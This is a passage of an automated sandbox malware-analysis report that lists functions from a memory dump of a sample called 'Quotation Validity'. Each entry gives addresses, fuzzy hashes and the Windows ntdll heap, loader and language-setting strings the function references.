                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                • API String ID: 0-3591852110
                                                                                • Opcode ID: 23c205014bd897eff00ba0804195d27b842a44ab21169b4684aa7cc68ed7212e
                                                                                • Instruction ID: 7c3f284ffe6aa5e7cdd132beeb35520a4961abf59046a95bef4d7a86f67be315
                                                                                • Opcode Fuzzy Hash: 23c205014bd897eff00ba0804195d27b842a44ab21169b4684aa7cc68ed7212e
                                                                                • Instruction Fuzzy Hash: 1B12BF30600662DFE7258F29C485BBBBBE5FF19B14F58845AE48A8B761D734E8C1CB50
                                                                                Function 0136D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                • API String ID: 0-3532704233
                                                                                • Opcode ID: 536139eaf20fbc96c3a94539a41df9fba05c8e80420720be99fc1035b42d4966
                                                                                • Instruction ID: f78f0327492997c2a8d0fe2cb8b4fe26b47979d82c64072f31ef8f31ce225ff6
                                                                                • Opcode Fuzzy Hash: 536139eaf20fbc96c3a94539a41df9fba05c8e80420720be99fc1035b42d4966
                                                                                • Instruction Fuzzy Hash: 76B1A0716083599FD711DF58C480A6BBBECAF84758F01892EFAC5D7204E730DD488B92
                                                                                Function 01409179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                • API String ID: 0-3063724069
                                                                                • Opcode ID: 98a9b174b39af3769254e1e3b82a39670f66879c0f86b7a3417f04915bf92900
                                                                                • Instruction ID: f7944487aa1793b625072302f199e015d4834e8daaa3654e68b03752155f4d94
                                                                                • Opcode Fuzzy Hash: 98a9b174b39af3769254e1e3b82a39670f66879c0f86b7a3417f04915bf92900
                                                                                • Instruction Fuzzy Hash: BED1E9B2804312ABD722DB59C840B6BB7E8AF9471CF45493EFA8C972A1D770D944C792
                                                                                Function 01420274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                • API String ID: 0-1700792311
                                                                                • Opcode ID: 71b4138aa0d88e7f23cfc728cdff2a84b408917ed3cc94b4f20272ef552866b6
                                                                                • Instruction ID: 461e7d5d5720acf1f85ff25ed6b71bd760319b7cb24b4d37a6c827e36e578831
                                                                                • Opcode Fuzzy Hash: 71b4138aa0d88e7f23cfc728cdff2a84b408917ed3cc94b4f20272ef552866b6
                                                                                • Instruction Fuzzy Hash: 24D1CF31A00695DFDB22DF68C444AAEBBF1FF5A718F48805AF4499B772C7359981CB10
                                                                                Function 013A63FF Relevance: 10.3, Strings: 8, Instructions: 261COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$X,$_LdrpInitialize$h=$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-1871083006
                                                                                • Opcode ID: 8e05e18377c674c9ceda8d55ab428c1a9a3ad5f4f80b539a232f3f639dc1582e
                                                                                • Instruction ID: ad5ea16e37b6299a37e43f6a1092e5ac24b56170e75a04b9667d6d5b8be71f92
                                                                                • Opcode Fuzzy Hash: 8e05e18377c674c9ceda8d55ab428c1a9a3ad5f4f80b539a232f3f639dc1582e
                                                                                • Instruction Fuzzy Hash: 7E9156B0B00325DBEB35DF18D84ABAA7BE5EB54B6CF08412DE900BB6E1D7749801C791
                                                                                Function 0136D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • @, xrefs: 0136D2AF
                                                                                • @, xrefs: 0136D313
                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0136D146
                                                                                • @, xrefs: 0136D0FD
                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0136D262
                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0136D0CF
                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0136D2C3
                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 0136D196
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                • API String ID: 0-1356375266
                                                                                • Opcode ID: 139c78fc0afedf0329b71edfc316bffcf9a5008d089ca30e28efe902f41b6523
                                                                                • Instruction ID: 4016f30c0000d374651b8d4996754f789fae97a3a71974ce080ccefd91d41b68
                                                                                • Opcode Fuzzy Hash: 139c78fc0afedf0329b71edfc316bffcf9a5008d089ca30e28efe902f41b6523
                                                                                • Instruction Fuzzy Hash: 3EA16F7160834A9FD721DF59C480B9BBBE8BB94719F00892EF6C897241E774D908CF92
                                                                                Function 0136645D Relevance: 8.9, Strings: 7, Instructions: 150COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$X,$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-4130463282
                                                                                • Opcode ID: 6c78ab3b852b7caf73187502d3dab13b89ff2c5d85d06351137693aa28f2ad6d
                                                                                • Instruction ID: d59cc33737c937fe41b5a6a6b298d97d14eefb88ca7596c4b7d5936930390bbb
                                                                                • Opcode Fuzzy Hash: 6c78ab3b852b7caf73187502d3dab13b89ff2c5d85d06351137693aa28f2ad6d
                                                                                • Instruction Fuzzy Hash: C95180B5208345DFE724DF28D842FAB77E8EB84B8CF01491DF5959B264DA30E904CB92
                                                                                Function 0136F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-523794902
                                                                                • Opcode ID: 893b23cce90bfa7f7931c1e62cc36c29eb0bf32289cb719e44b804f5c65c6bb8
                                                                                • Instruction ID: 3c759d0a74a09603c4434ff3e89b32061767a91a6e5498fb2007e1a26ca63abb
                                                                                • Opcode Fuzzy Hash: 893b23cce90bfa7f7931c1e62cc36c29eb0bf32289cb719e44b804f5c65c6bb8
                                                                                • Instruction Fuzzy Hash: A242FE312083829FD715DF28D494A2ABBEDFF88A08F18896DF4858B755D730E845CB52
                                                                                Function 0138B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                • API String ID: 0-122214566
                                                                                • Opcode ID: a0674ac84f12dd56b2126061cde26770b5400c93c4ba08d84ad730a073396e3c
                                                                                • Instruction ID: b81c555f3c0aa67a4c16e794b305191834fd9f5703f20aeea1fac79d16618fa2
                                                                                • Opcode Fuzzy Hash: a0674ac84f12dd56b2126061cde26770b5400c93c4ba08d84ad730a073396e3c
                                                                                • Instruction Fuzzy Hash: CFC16971A0031B9BDB25AB6CC881BBEFBB9BF4431CF1440A9ED01AB695D7B0D944C391
                                                                                Function 0141F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                • API String ID: 0-1745908468
                                                                                • Opcode ID: a941e5254e8d9525a7b042c12aaea69a509dc138c70a104d1885f3f4a849f461
                                                                                • Instruction ID: dacf6fed91e2da251a79462496f94be1313c85b8992c7434bd944e962b319dd8
                                                                                • Opcode Fuzzy Hash: a941e5254e8d9525a7b042c12aaea69a509dc138c70a104d1885f3f4a849f461
                                                                                • Instruction Fuzzy Hash: BD910131A00641DFDB12DF69C440AAEBBF1FF59718F18841EE8499B379CB35A94ACB10
                                                                                Function 0139F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013E02BD
                                                                                • RTL: Re-Waiting, xrefs: 013E031E
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013E02E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                • API String ID: 0-2474120054
                                                                                • Opcode ID: be75f4cf427cc92be647f9f646ace100947754af4bf0551665af473cb1437085
                                                                                • Instruction ID: 3de737691428696265e47e367af2eacc78a78f9f7a6874dbd8f28c92cc716c20
                                                                                • Opcode Fuzzy Hash: be75f4cf427cc92be647f9f646ace100947754af4bf0551665af473cb1437085
                                                                                • Instruction Fuzzy Hash: B4E1AE306087419FDB25CF2CC884B6ABBE8BB84728F140A6DF5A5CB6E1D774D945CB42
                                                                                Function 013951EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01395352
                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01395247
                                                                                • Kernel-MUI-Language-SKU, xrefs: 0139542B
                                                                                • WindowsExcludedProcs, xrefs: 0139522A
                                                                                • Kernel-MUI-Language-Allowed, xrefs: 0139527B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                • API String ID: 0-258546922
                                                                                • Opcode ID: 290d1ed458c96f476fc7c4aa92086b7a1dab5fe085023992e36c73d36a7e104f
                                                                                • Instruction ID: f543a5867ea2ad07c90d68e9704a09246fcdb5dd3248472f8b676414768055a9
                                                                                • Opcode Fuzzy Hash: 290d1ed458c96f476fc7c4aa92086b7a1dab5fe085023992e36c73d36a7e104f
                                                                                • Instruction Fuzzy Hash: 5FF13B72D00219EBDF12DFA9C980AEEBBBDFF58658F15406AE501E7211E7709E41CB90
                                                                                Function 013870C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                • API String ID: 0-3178619729
                                                                                • Opcode ID: a3bd9be09b8156484c1092ddf56efd41c939960d8b1e81d5bdbf01f5f3f2b471
                                                                                • Instruction ID: 414e7ac77b9b2b7ebcc9a5331398dec354f135c434a80439d1d53a4bc0fcb916
                                                                                • Opcode Fuzzy Hash: a3bd9be09b8156484c1092ddf56efd41c939960d8b1e81d5bdbf01f5f3f2b471
                                                                                • Instruction Fuzzy Hash: E313AF70A00359DFEB25DF68C4807A9BBF2FF59308F6481A9D949AB381D734A945CF90
                                                                                Function 01381070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-3570731704
                                                                                • Opcode ID: 341cb0ef1ab7fcf8f3fefe655922e2d4546a99ea9c0c86a2592b96f2054fb0e0
                                                                                • Instruction ID: 8ef33aae1ebb541e57e7e670501ea0ca95478e239d400c5aba7581230c3684d3
                                                                                • Opcode Fuzzy Hash: 341cb0ef1ab7fcf8f3fefe655922e2d4546a99ea9c0c86a2592b96f2054fb0e0
                                                                                • Instruction Fuzzy Hash: 62925971A00329CFEB25DF28DC80BA9B7B5BF45318F1581EAE949A7291D7309E81CF51
                                                                                Function 01371460 Relevance: 5.4, Strings: 4, Instructions: 385COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                • API String ID: 0-2084224854
                                                                                • Opcode ID: f3403732a8099bade9c2cd267aa600e00418c9c8f73d01832853585ffe5a0d16
                                                                                • Instruction ID: f41fbb81055515896eea1f45e9efd3db60c17d2a4d898508ad6a9ff5c1d8cde3
                                                                                • Opcode Fuzzy Hash: f3403732a8099bade9c2cd267aa600e00418c9c8f73d01832853585ffe5a0d16
                                                                                • Instruction Fuzzy Hash: 4FE10332A04245DFDB29CF2CC491B7ABBFAAF44718F18845DE996CB646D738E940CB50
                                                                                Function 0137A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                • API String ID: 0-379654539
                                                                                • Opcode ID: 23ae09b12b51a422ea58831a87f4fe11a96403193ab76c20374ba60d6dcd05e6
                                                                                • Instruction ID: fc3b8a79b49948fd35e84962ed58da1b95f85094cc4a771bb07efeb0db4d4f35
                                                                                • Opcode Fuzzy Hash: 23ae09b12b51a422ea58831a87f4fe11a96403193ab76c20374ba60d6dcd05e6
                                                                                • Instruction Fuzzy Hash: 2CC19971108386CFD721CF68C044B6EBBE8BF84718F08496AF9959B750E739DA49CB52
                                                                                Function 013A8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 013A8421
                                                                                • LdrpInitializeProcess, xrefs: 013A8422
                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013A855E
                                                                                • @, xrefs: 013A8591
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-1918872054
                                                                                • Opcode ID: 501779a4ee6af4cfb855de842c0cc90bac49471bf6beb5095c54c38c04a4eafe
                                                                                • Instruction ID: c825d079a07d2f529695c21d79f4dd2e747653891878aa1551a8af7232f41216
                                                                                • Opcode Fuzzy Hash: 501779a4ee6af4cfb855de842c0cc90bac49471bf6beb5095c54c38c04a4eafe
                                                                                • Instruction Fuzzy Hash: B3917F71548345AFDB21EF29CC84EABBAECFF8474CF40096DFA8492151E734E9448B62
                                                                                Function 014211A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                • API String ID: 0-336120773
                                                                                • Opcode ID: 79f030f98fd174a75c6a66f5831f5afab16f2555821e17a71ffc5ad3a6a8e4dd
                                                                                • Instruction ID: ae2be8c3cd80ff9180981d4fbea3971771e38044a5186890eb566a5138e652e5
                                                                                • Opcode Fuzzy Hash: 79f030f98fd174a75c6a66f5831f5afab16f2555821e17a71ffc5ad3a6a8e4dd
                                                                                • Instruction Fuzzy Hash: BB311271200520EFDB11DB9CC889F67B7E8EF06E68F55405AF501EB3A5EA71BC80CA64
                                                                                Function 0139245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 013DA9A2
                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 013DA992
                                                                                • LdrpDynamicShimModule, xrefs: 013DA998
                                                                                • apphelp.dll, xrefs: 01392462
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-176724104
                                                                                • Opcode ID: c0d004eed49fb47338eb7363db296db6cc5520dafa163f9a9a63fd01937748a5
                                                                                • Instruction ID: 1ea756a24e32f88983453dd1e1ea250dbbc90760da07ebc1865d99672fdccee3
                                                                                • Opcode Fuzzy Hash: c0d004eed49fb47338eb7363db296db6cc5520dafa163f9a9a63fd01937748a5
                                                                                • Instruction Fuzzy Hash: AE315BB6600306EBEB319F6DE981E6A77B8FB80B0CF16405DE90167275C7B09841C781
                                                                                Function 01369148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                • API String ID: 0-1391187441
                                                                                • Opcode ID: a84aa47d62d6e62237c76dd5e63bf38def9fad1989ec620c383ff6675b5995fd
                                                                                • Instruction ID: 79216a4a018939d6c26d5577ce86e524ec3b40c062034867667094059b337ef5
                                                                                • Opcode Fuzzy Hash: a84aa47d62d6e62237c76dd5e63bf38def9fad1989ec620c383ff6675b5995fd
                                                                                • Instruction Fuzzy Hash: EF31A236A00105EFDB01DB5DC889F9AB7FCEF45A6CF148069E914A7295D770ED40CB60
                                                                                Function 013F20DE Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 013F2104
                                                                                • LdrpInitializationFailure, xrefs: 013F20FA
                                                                                • Process initialization failed with status 0x%08lx, xrefs: 013F20F3
                                                                                • X,, xrefs: 013F20EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$X,$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-2740999052
                                                                                • Opcode ID: 07f57195fcd27c3f977f5d1eac418aa8d51b23ca3f32ecc4fe5c4dd4a4682dd2
                                                                                • Instruction ID: c04b944e259d4e2fc3fb85802440bb53110f34c670701056ba25d3373c7b5aac
                                                                                • Opcode Fuzzy Hash: 07f57195fcd27c3f977f5d1eac418aa8d51b23ca3f32ecc4fe5c4dd4a4682dd2
                                                                                • Instruction Fuzzy Hash: BDF0AFB9640348AFE724EA4DCC56F9A3BACEB40E5CF10006DFB046B791D2A0A9008695
                                                                                Function 0136A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                • API String ID: 0-2779062949
                                                                                • Opcode ID: 0607c32e75af5f4311248c643d8b07f1f6f9f1c10fdb7cfbf703ad5c28a23782
                                                                                • Instruction ID: f870b2f4ab8464dd3c305392705309a9d72d4307cb206bbd4fe4d975742c2829
                                                                                • Opcode Fuzzy Hash: 0607c32e75af5f4311248c643d8b07f1f6f9f1c10fdb7cfbf703ad5c28a23782
                                                                                • Instruction Fuzzy Hash: 88A15D719112299BDF31DB68CC88BEAB7B8EF44B18F1041E9DA0DA7250D735AE84CF54
                                                                                Function 0137B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                • API String ID: 0-373624363
                                                                                • Opcode ID: 96ef07b6fffbbdb0708485b18cfdc58000a6abc16787a30819b5a70c66a294dc
                                                                                • Instruction ID: d1908809dfb29b563bd90e408832d3019b23890b54df83ec923bf14a525f0fe7
                                                                                • Opcode Fuzzy Hash: 96ef07b6fffbbdb0708485b18cfdc58000a6abc16787a30819b5a70c66a294dc
                                                                                • Instruction Fuzzy Hash: 4E91CFB2A04609CFEB31CF58D480BAEBBB4FF00728F154199E911AB294D77C9E44CB91
                                                                                Function 013A909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %$&$@
                                                                                • API String ID: 0-1537733988
                                                                                • Opcode ID: 891a91cca0d127a2b051b152899f16bdb82483d38f0b754b8387aa93d4f4dc69
                                                                                • Instruction ID: 0dc2aa9b829471a657f7379475fab7fd9d07e8797d1f184c0b0c079fc07e8e10
                                                                                • Opcode Fuzzy Hash: 891a91cca0d127a2b051b152899f16bdb82483d38f0b754b8387aa93d4f4dc69
                                                                                • Instruction Fuzzy Hash: BB71F37050830A9FCB14DF18C584B2BBBE9FF9461CF908A1DE59667691C730E905CB92
                                                                                Function 013915F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 013DA589
                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 013DA59A
